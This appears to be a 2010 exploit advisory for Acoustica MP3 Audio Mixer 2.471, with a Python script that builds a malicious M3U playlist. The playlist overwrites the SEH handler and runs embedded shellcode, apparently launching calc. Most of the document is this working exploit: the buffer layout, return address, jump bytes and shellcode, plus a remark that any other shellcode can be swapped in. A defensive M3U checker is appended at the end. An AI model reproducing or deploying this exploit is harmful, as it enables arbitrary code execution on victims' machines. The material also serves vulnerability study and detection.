
# Title : Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
# Published : 2010-09-09
# Author : Carlos Mario Penagos Hollmann


# Exploit Title: Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
# Date: September 8 2010
# Author: Carlos Hollmann 
# Software Link: http://www.acoustica.com/downloading.asp?p=1
# Version: 2.471
# Tested on: Windows XP SP3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
# CVE : 


#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __  
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /  
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/____/   

# COLOMBIA presents.............
#        PoC from  D3V!L FucK3r http://www.exploit-db.com/exploits/9213/
#
#	Carlos Mario Penagos Hollmann A.K.A Elvenking  shogilord@gmail.com
#	Extended M3U directives

# 	Background from http://hanna.pyxidis.org/tech/m3u.html


 
#	The software does not correctly handle the M3U header and extra info when the file is imported into an open sound group.
# 	Trigger: launch the app, open an existing sound group, e.g. (C:\Program Files\Acoustica MP3 Audio Mixer\example.sgp), then import crash.m3u and....KaaaaBooom!!
#
#     
#     Greetings: My Family, Algeria-->sud0 Australia--> tecr0c,Peru-->fataku,Spain-->Alberto Hervalejo, OFFSEC TEAM and all my friends in Colombia 
#	!!! PEACE FOR MY COUNTRY, PEACE FOR COLOMBIA !!! Freedom!!
	



# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# I do not want anyone to use this script
# for malicious and/or illegal purposes
# I cannot be held responsible for any illegal use.
 
# Note : you are not allowed to edit/modify this code. 
# If you do, I will not be held responsible for any damages this may cause.

#!/usr/bin/python


magic 	= "crash.m3u"


vuln 	= "\x23\x0D\x0A\x23\x0D\x0A" # Extended M3U, no EXTM3U, no EXTINFO; 0D can be changed to any other value (\x1b, \x0a, ...)


junk 		=	"\x41" * 816
ds_eax 		=	"\x25\x25\x47\x7E" # First call ds:[eax+8]; writeable memory address to put in EAX
morejunk 	=	"\x42" * 8308
nSEH 		=	"\xEB\x06\x90\x90" # short jmp, 6 bytes
SEH 		=	"\x3F\x28\xD1\x72" # SEH handler
nops 		=	"\x90" * 10 # landing pad
shellcode	=	"\x8b\xec\x55\x8b\xec\x68\x20\x20\x20\x2f\x68\x63\x61\x6c\x63\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0" # Thanks sud0; any other shell works too, just remove "\x00\x0a"
payload	=	vuln+junk+ds_eax+morejunk+nSEH+SEH+nops+shellcode

file = open(magic , 'w')
file.write(payload)
file.close()
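
For defenders, the file described above (bare `#` directive lines with no EXTM3U header, followed by one very long entry) can be flagged before a playlist is imported. The check below is an added example, not part of the original advisory or of the vendor's code; the function name, the thresholds and both sample playlists are assumptions constructed for illustration.

```python
import re

MAX_LINE = 1024  # assumed ceiling (not from the advisory); entries are paths or URLs
MIN_RUN = 64     # assumed: this many identical bytes in a row counts as padding
RUN_RE = re.compile(rb"(.)\1{%d,}" % (MIN_RUN - 1), re.DOTALL)


def inspect_m3u(data):
    """Return findings for raw M3U bytes; an empty list means nothing was flagged."""
    findings = []
    lines = re.split(rb"\r\n|\r|\n", data)
    nonblank = [ln for ln in lines if ln.strip()]
    # Extended directives (#...) are only expected after a leading #EXTM3U line.
    has_directive = any(ln.startswith(b"#") for ln in nonblank)
    if has_directive and not nonblank[0].startswith(b"#EXTM3U"):
        findings.append("directives without #EXTM3U header")
    for num, ln in enumerate(lines, 1):
        if len(ln) > MAX_LINE:
            findings.append("line %d: %d bytes (limit %d)" % (num, len(ln), MAX_LINE))
        if RUN_RE.search(ln):
            findings.append("line %d: run of %d+ identical bytes" % (num, MIN_RUN))
        # Tab is tolerated; other C0 control bytes and DEL do not belong in an entry.
        if any((b < 0x20 and b != 0x09) or b == 0x7F for b in ln):
            findings.append("line %d: control bytes in entry" % num)
    return findings


# Constructed samples: a well-formed extended playlist, and a file with the same
# shape as the trigger (header-less '#' lines, then one oversized entry of filler).
BENIGN = b"#EXTM3U\r\n#EXTINF:215,Artist - Title\r\nC:\\Music\\track01.mp3\r\n"
MALFORMED = b"#\r\n#\r\n" + b"A" * 9000 + b"\x01\x02\r\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, inspect_m3u(sample))
```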